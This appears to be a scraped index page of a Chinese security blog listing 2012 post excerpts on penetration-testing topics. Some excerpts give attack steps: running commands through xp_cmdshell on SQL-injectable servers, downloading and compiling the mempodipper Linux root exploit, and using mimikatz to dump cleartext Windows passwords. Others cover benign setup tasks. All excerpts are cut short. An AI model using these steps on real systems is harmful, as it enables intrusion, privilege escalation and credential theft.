4shell - 4shell.org
General Information:
Latest News:
无xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令 16 Mar 2012 | 12:11 pm
利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句: EXEC master.dbo.xp_cmdshell 'dir c:\' 但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名,这时侯许多人也许会放弃,因为我们无法运行任何的cmd命令,很难查看...
解决BackTrack 5 R2 Metasploit Bug 9 Mar 2012 | 01:52 am
Metasploit 在 BackTrack 5-R2 中启动不起来 解决办法: cd /opt/metasploit/common/lib mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b mv libssl.so.0.9.8 libssl.so.0.9.8-backup ln -s /usr/lib/libcrypto.so.0.9.8 ln -...
BackBox Linux 2.01 6 Mar 2012 | 10:22 pm
BackBox是基于Ubuntu的发行,它被开发用于网络渗透测试及安全评估。它被设计为快捷且易于使用。它提供了一份最低纲领的但完整的桌面环境,而这得益于它自己的软件仓库,该仓库总是同步到最新版本的、最常用且以合乎道德而闻名的黑客工具。 Pro-actively protect your IT infrastructure with BackBox. It is the perfect secur...
Linux 2.6.39 到 3.2.0 爆提权漏洞 6 Mar 2012 | 10:21 pm
1.下载漏洞利用文件 wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c 2.编译 gcc mempodipper.c -o mempodipper 3.执行前察看 netcat@netcat:~$ uname -r 3.0.0-12-generic netcat@netcat:~$ cat /etc/issue ...
BackTrack 5 从R1 升级到 BackTrack 5 R2 6 Mar 2012 | 10:10 pm
Thelong awaited release of the BackTrack 5 R2 kernel has arrived, and it’s now available in our repositories. With a spanking brand new 3.2.6 kernel, a huge array of new and updated tools and security...
来看看老外的日站思路 6 Mar 2012 | 05:01 pm
原文:http://resources.infosecinstitute.com/hacking-a-wordpress-site 《Targeting and Hacking a WordPress Site》 问题的答案看起来不那么确定,显而易见的是黑掉一个站点有很多种方法。在这篇文章,我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的! 让我们来看看目标站点:hack-tes...
神器 - mimikatz 24 Feb 2012 | 07:30 pm
神器下载地址: http://blog.gentilkiwi.com/mimikatz 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass 自己尝试了下用 win20...
CentOS 6 编译安装Nginx+PHP+Mysql 17 Feb 2012 | 08:22 pm
[1].安装 Nginx 1,添加一个不能登录且没有主目录的用户: 1 # useradd www -M -s /sbin/nologin 2,必要的组件 1 2 3 4 5 # wget ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/pcre-8.13.zip # unzip pcre-8.13.zip # c...
BT5 R1 启动自动进入图形界面 17 Feb 2012 | 08:19 pm
第一种,直接登录root用户的图形界面,不用输入密码 1,安装rungetty 1 # apt-get install rungetty 2,编辑 /etc/init/tty1.conf 1 # gedit /etc/init/tty1.conf 将exec这一段注释掉并加一句 1 2 #exec /sbin/getty 38400 tty1 exec /sbin/rung...
BT5 R1 下VPN拨号 安装networkmanager 17 Feb 2012 | 08:18 pm
1,VPN拔号: 1 2 3 4 5 6 7 # apt-get install network-manager-gnome # apt-get install network-manager-pptp # apt-get install network-manager-vpnc # cp /etc/network/interfaces /etc/network/interf...